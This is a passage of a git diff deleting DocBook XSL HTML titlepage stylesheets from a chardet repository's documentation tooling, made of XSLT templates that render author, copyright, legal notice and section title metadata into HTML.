select="info/pubdate"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revision"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/revhistory"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="simplesectinfo/abstract"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="simplesect.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="simplesect.titlepage.verso"> -</xsl:template> - -<xsl:template name="simplesect.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if> -</xsl:template> - -<xsl:template name="simplesect.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="simplesect.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="simplesect.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="simplesect.titlepage.before.recto"/> - <xsl:call-template name="simplesect.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="simplesect.titlepage.before.verso"/> - <xsl:call-template name="simplesect.titlepage.verso"/> - </div> - <xsl:call-template name="simplesect.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="simplesect.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="simplesect.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="simplesect.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="simplesect.titlepage.recto.style"> -<xsl:apply-templates select="." mode="simplesect.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="bibliography.titlepage.recto"> - <div xsl:use-attribute-sets="bibliography.titlepage.recto.style"> -<xsl:call-template name="component.title"> -<xsl:with-param name="node" select="ancestor-or-self::bibliography[1]"/> -</xsl:call-template></div> - <xsl:choose> - <xsl:when test="bibliographyinfo/subtitle"> - <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="bibliographyinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="bibliography.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - -</xsl:template> - -<xsl:template name="bibliography.titlepage.verso"> -</xsl:template> - -<xsl:template name="bibliography.titlepage.separator"> -</xsl:template> - -<xsl:template name="bibliography.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="bibliography.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="bibliography.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="bibliography.titlepage.before.recto"/> - <xsl:call-template name="bibliography.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="bibliography.titlepage.before.verso"/> - <xsl:call-template name="bibliography.titlepage.verso"/> - </div> - <xsl:call-template name="bibliography.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="bibliography.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="bibliography.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="subtitle" mode="bibliography.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="bibliography.titlepage.recto.style"> -<xsl:apply-templates select="." mode="bibliography.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="glossary.titlepage.recto"> - <div xsl:use-attribute-sets="glossary.titlepage.recto.style"> -<xsl:call-template name="component.title"> -<xsl:with-param name="node" select="ancestor-or-self::glossary[1]"/> -</xsl:call-template></div> - <xsl:choose> - <xsl:when test="glossaryinfo/subtitle"> - <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="glossaryinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="glossary.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - -</xsl:template> - -<xsl:template name="glossary.titlepage.verso"> -</xsl:template> - -<xsl:template name="glossary.titlepage.separator"> -</xsl:template> - -<xsl:template name="glossary.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="glossary.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="glossary.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="glossary.titlepage.before.recto"/> - <xsl:call-template name="glossary.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="glossary.titlepage.before.verso"/> - <xsl:call-template name="glossary.titlepage.verso"/> - </div> - <xsl:call-template name="glossary.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="glossary.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="glossary.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="subtitle" mode="glossary.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="glossary.titlepage.recto.style"> -<xsl:apply-templates select="." mode="glossary.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="index.titlepage.recto"> - <div xsl:use-attribute-sets="index.titlepage.recto.style"> -<xsl:call-template name="component.title"> -<xsl:with-param name="node" select="ancestor-or-self::index[1]"/> -</xsl:call-template></div> - <xsl:choose> - <xsl:when test="indexinfo/subtitle"> - <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="indexinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="index.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - -</xsl:template> - -<xsl:template name="index.titlepage.verso"> -</xsl:template> - -<xsl:template name="index.titlepage.separator"> -</xsl:template> - -<xsl:template name="index.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="index.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="index.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="index.titlepage.before.recto"/> - <xsl:call-template name="index.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="index.titlepage.before.verso"/> - <xsl:call-template name="index.titlepage.verso"/> - </div> - <xsl:call-template name="index.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="index.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="index.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="subtitle" mode="index.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="index.titlepage.recto.style"> -<xsl:apply-templates select="." mode="index.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="setindex.titlepage.recto"> - <div xsl:use-attribute-sets="setindex.titlepage.recto.style"> -<xsl:call-template name="component.title"> -<xsl:with-param name="node" select="ancestor-or-self::setindex[1]"/> -</xsl:call-template></div> - <xsl:choose> - <xsl:when test="setindexinfo/subtitle"> - <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="setindexinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="setindex.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - -</xsl:template> - -<xsl:template name="setindex.titlepage.verso"> -</xsl:template> - -<xsl:template name="setindex.titlepage.separator"> -</xsl:template> - -<xsl:template name="setindex.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="setindex.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="setindex.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="setindex.titlepage.before.recto"/> - <xsl:call-template name="setindex.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="setindex.titlepage.before.verso"/> - <xsl:call-template name="setindex.titlepage.verso"/> - </div> - <xsl:call-template name="setindex.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="setindex.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="setindex.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="subtitle" mode="setindex.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="setindex.titlepage.recto.style"> -<xsl:apply-templates select="." mode="setindex.titlepage.recto.mode"/> -</div> -</xsl:template> - -</xsl:stylesheet> \ No newline at end of file diff --git a/chardet/docs/docbook/xsl/html/titlepage.xsl b/chardet/docs/docbook/xsl/html/titlepage.xsl deleted file mode 100644 index edb6d6b..0000000 --- a/chardet/docs/docbook/xsl/html/titlepage.xsl +++ /dev/null @@ -1,792 +0,0 @@ -<?xml version='1.0'?> -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" - version='1.0'> - -<!-- ******************************************************************** - $Id: titlepage.xsl,v 1.1.1.1 2004/06/22 02:10:35 f8dy Exp $ - ******************************************************************** - - This file is part of the XSL DocBook Stylesheet distribution. - See ../README or http://nwalsh.com/docbook/xsl/ for copyright - and other information. - - ******************************************************************** --> - -<!-- ==================================================================== --> - -<xsl:attribute-set name="book.titlepage.recto.style"/> -<xsl:attribute-set name="book.titlepage.verso.style"/> - -<xsl:attribute-set name="article.titlepage.recto.style"/> -<xsl:attribute-set name="article.titlepage.verso.style"/> - -<xsl:attribute-set name="set.titlepage.recto.style"/> -<xsl:attribute-set name="set.titlepage.verso.style"/> - -<xsl:attribute-set name="part.titlepage.recto.style"/> -<xsl:attribute-set name="part.titlepage.verso.style"/> - -<xsl:attribute-set name="partintro.titlepage.recto.style"/> -<xsl:attribute-set name="partintro.titlepage.verso.style"/> - -<xsl:attribute-set name="reference.titlepage.recto.style"/> -<xsl:attribute-set name="reference.titlepage.verso.style"/> - -<xsl:attribute-set name="refentry.titlepage.recto.style"/> -<xsl:attribute-set name="refentry.titlepage.verso.style"/> - -<xsl:attribute-set name="dedication.titlepage.recto.style"/> -<xsl:attribute-set name="dedication.titlepage.verso.style"/> - -<xsl:attribute-set name="preface.titlepage.recto.style"/> -<xsl:attribute-set name="preface.titlepage.verso.style"/> - -<xsl:attribute-set name="chapter.titlepage.recto.style"/> -<xsl:attribute-set name="chapter.titlepage.verso.style"/> - -<xsl:attribute-set name="appendix.titlepage.recto.style"/> -<xsl:attribute-set name="appendix.titlepage.verso.style"/> - -<xsl:attribute-set name="bibliography.titlepage.recto.style"/> -<xsl:attribute-set name="bibliography.titlepage.verso.style"/> - -<xsl:attribute-set name="glossary.titlepage.recto.style"/> -<xsl:attribute-set name="glossary.titlepage.verso.style"/> - -<xsl:attribute-set name="index.titlepage.recto.style"/> -<xsl:attribute-set name="index.titlepage.verso.style"/> - -<xsl:attribute-set name="setindex.titlepage.recto.style"/> -<xsl:attribute-set name="setindex.titlepage.verso.style"/> - -<xsl:attribute-set name="section.titlepage.recto.style"/> -<xsl:attribute-set name="section.titlepage.verso.style"/> - -<xsl:attribute-set name="sect1.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="sect1.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="sect2.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="sect2.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="sect3.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="sect3.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="sect4.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="sect4.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="sect5.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="sect5.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="simplesect.titlepage.recto.style" - use-attribute-sets="section.titlepage.recto.style"/> -<xsl:attribute-set name="simplesect.titlepage.verso.style" - use-attribute-sets="section.titlepage.verso.style"/> - -<xsl:attribute-set name="table.of.contents.titlepage.recto.style"/> -<xsl:attribute-set name="table.of.contents.titlepage.verso.style"/> - -<xsl:attribute-set name="list.of.tables.titlepage.recto.style"/> -<xsl:attribute-set name="list.of.tables.contents.titlepage.verso.style"/> - -<xsl:attribute-set name="list.of.figures.titlepage.recto.style"/> -<xsl:attribute-set name="list.of.figures.contents.titlepage.verso.style"/> - -<xsl:attribute-set name="list.of.equations.titlepage.recto.style"/> -<xsl:attribute-set name="list.of.equations.contents.titlepage.verso.style"/> - -<xsl:attribute-set name="list.of.examples.titlepage.recto.style"/> -<xsl:attribute-set name="list.of.examples.contents.titlepage.verso.style"/> - -<xsl:attribute-set name="list.of.unknowns.titlepage.recto.style"/> -<xsl:attribute-set name="list.of.unknowns.contents.titlepage.verso.style"/> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="titlepage.mode"> - <!-- if an element isn't found in this mode, try the default mode --> - <xsl:apply-templates select="."/> -</xsl:template> - -<xsl:template match="abbrev" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="abstract" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:call-template name="anchor"/> - <xsl:call-template name="formal.object.heading"> - <xsl:with-param name="title"> - <xsl:apply-templates select="." mode="title.markup"/> - </xsl:with-param> - </xsl:call-template> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="abstract/title" mode="titlepage.mode"> -</xsl:template> - -<xsl:template match="address" mode="titlepage.mode"> - <xsl:param name="suppress-numbers" select="'0'"/> - - <xsl:variable name="rtf"> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$suppress-numbers = '0' - and @linenumbering = 'numbered' - and $use.extensions != '0' - and $linenumbering.extension != '0'"> - <div class="{name(.)}"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="content"> - <xsl:call-template name="number.rtf.lines"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </xsl:with-param> - </xsl:call-template> - </div> - </xsl:when> - - <xsl:otherwise> - <div class="{name(.)}"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="content"> - <xsl:call-template name="make-verbatim"> - <xsl:with-param name="rtf" select="$rtf"/> - </xsl:call-template> - </xsl:with-param> - </xsl:call-template> - </div> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="affiliation" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="artpagenums" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="author" mode="titlepage.mode"> - <div class="{name(.)}"> - <h3 class="{name(.)}"><xsl:call-template name="person.name"/></h3> - <xsl:apply-templates mode="titlepage.mode" select="./contrib"/> - <xsl:apply-templates mode="titlepage.mode" select="./affiliation"/> - <xsl:apply-templates mode="titlepage.mode" select="./email"/> - </div> -</xsl:template> - -<xsl:template match="authorblurb|personblurb" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="authorgroup" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="authorinitials" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="bibliomisc" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="bibliomset" mode="titlepage.mode"> - <xsl:apply-templates mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="collab" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="confgroup" mode="titlepage.mode"> - <div class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> -</xsl:template> - -<xsl:template match="confdates" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="confsponsor" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="conftitle" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="confnum" mode="titlepage.mode"> - <!-- suppress --> -</xsl:template> - -<xsl:template match="contractnum" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="contractsponsor" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="contrib" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </span> -</xsl:template> - -<xsl:template match="copyright" mode="titlepage.mode"> - <p class="{name(.)}"> - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'Copyright'"/> - </xsl:call-template> - <xsl:call-template name="gentext.space"/> - <xsl:call-template name="dingbat"> - <xsl:with-param name="dingbat">copyright</xsl:with-param> - </xsl:call-template> - <xsl:call-template name="gentext.space"/> - <xsl:call-template name="copyright.years"> - <xsl:with-param name="years" select="year"/> - <xsl:with-param name="print.ranges" select="$make.year.ranges"/> - <xsl:with-param name="single.year.ranges" - select="$make.single.year.ranges"/> - </xsl:call-template> - <xsl:call-template name="gentext.space"/> - <xsl:apply-templates select="holder" mode="titlepage.mode"/> - </p> -</xsl:template> - -<xsl:template match="year" mode="titlepage.mode"> - <xsl:choose> - <xsl:when test="$show.revisionflag != 0 and @revisionflag"> - <span class="{@revisionflag}"> - <xsl:apply-templates mode="titlepage.mode"/> - </span> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="holder" mode="titlepage.mode"> - <xsl:choose> - <xsl:when test="$show.revisionflag != 0 and @revisionflag"> - <span class="{@revisionflag}"> - <xsl:apply-templates mode="titlepage.mode"/> - </span> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates mode="titlepage.mode"/> - </xsl:otherwise> - </xsl:choose> - <xsl:if test="position() < last()"> - <xsl:text>, </xsl:text> - </xsl:if> -</xsl:template> - -<xsl:template match="corpauthor" mode="titlepage.mode"> - <h3 class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </h3> -</xsl:template> - -<xsl:template match="corpname" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="date" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="edition" mode="titlepage.mode"> - <p class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <xsl:call-template name="gentext.space"/> - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'Edition'"/> - </xsl:call-template> - </p> -</xsl:template> - -<xsl:template match="editor" mode="titlepage.mode"> - <h3 class="{name(.)}"><xsl:call-template name="person.name"/></h3> -</xsl:template> - -<xsl:template match="editor[position()=1]" mode="titlepage.mode"> - <h4 class="editedby"><xsl:call-template name="gentext.edited.by"/></h4> - <h3 class="{name(.)}"><xsl:call-template name="person.name"/></h3> -</xsl:template> - -<xsl:template match="email" mode="titlepage.mode"> - <!-- use the normal e-mail handling code --> - <xsl:apply-templates select="."/> -</xsl:template> - -<xsl:template match="firstname" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="graphic" mode="titlepage.mode"> - <!-- use the normal graphic handling code --> - <xsl:apply-templates select="."/> -</xsl:template> - -<xsl:template match="honorific" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="isbn" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="issn" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="biblioid" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="itermset" mode="titlepage.mode"> -</xsl:template> - -<xsl:template match="invpartnumber" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="issuenum" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="jobtitle" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="keywordset" mode="titlepage.mode"> -</xsl:template> - -<xsl:template match="legalnotice" mode="titlepage.mode"> - <xsl:variable name="id"><xsl:call-template name="object.id"/></xsl:variable> - <xsl:choose> - <xsl:when test="$generate.legalnotice.link != 0"> - <xsl:variable name="filename"> - <xsl:call-template name="make-relative-filename"> - <xsl:with-param name="base.dir" select="$base.dir"/> - <xsl:with-param name="base.name" select="concat('ln-',$id,$html.ext)"/> - </xsl:call-template> - </xsl:variable> - - <xsl:variable name="title"> - <xsl:apply-templates select="." mode="title.markup"/> - </xsl:variable> - - <a href="{concat('ln-',$id,$html.ext)}"> - <xsl:copy-of select="$title"/> - </a> - - <xsl:call-template name="write.chunk"> - <xsl:with-param name="filename" select="$filename"/> - <xsl:with-param name="quiet" select="$chunk.quietly"/> - <xsl:with-param name="content"> - <html> - <head> - <xsl:call-template name="system.head.content"/> - <xsl:call-template name="head.content"/> - <xsl:call-template name="user.head.content"/> - </head> - <body> - <xsl:call-template name="body.attributes"/> - <div class="{local-name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> - </body> - </html> - </xsl:with-param> - </xsl:call-template> - </xsl:when> - <xsl:otherwise> - <div class="{local-name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - </div> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="legalnotice/title" mode="titlepage.mode"> - <p class="legalnotice-title"><b><xsl:apply-templates/></b></p> -</xsl:template> - -<xsl:template match="lineage" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="modespec" mode="titlepage.mode"> -</xsl:template> - -<xsl:template match="orgdiv" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="orgname" mode="titlepage.mode"> - <span class="{name(.)}"> - <xsl:apply-templates mode="titlepage.mode"/> - <br/> - </span> -</xsl:template> - -<xsl:template match="othercredit" mode="titlepage.mode"> - <xsl:variable name="contrib" select="string(contrib)"/> - <xsl:choose> - <xsl:when test="contrib"> - <xsl:if test="not(preceding-sibling::othercredit[string(contrib)=$contrib])"> - <xsl:call-template name="paragraph"> - <xsl:with-param name="class" select="name(.)"/> - <xsl:with-param name="content"> - <xsl:apply-templates mode="titlepage.mode" select="contrib"/> - <xsl:text>: </xsl:text> - <xsl:call-template name="person.name"/> - <xsl:apply-templates mode="titlepage.mode" select="./affiliation"/> - <xsl:apply-templates select="following-sibling::othercredit[string(contrib)=$contrib]" mode="titlepage.othercredits"/> - </xsl:with-param> - </xsl:call-template> - </xsl:if> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="paragraph"> - <xsl:with-param name="class" select="name(.)"/> - <xsl:with-param name="content"> - <xsl:call-template name="person.name"/> - </xsl:with-param> - </xsl:call-template> - <xsl:apply-templates mode="titlepage.mode" select="./affiliation"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="othercredit" mode="titlepage.othercredits"> - <xsl:text>, </xsl:text> - <xsl:call-template name="person.name"/> -</xsl:template> - -<xsl:template 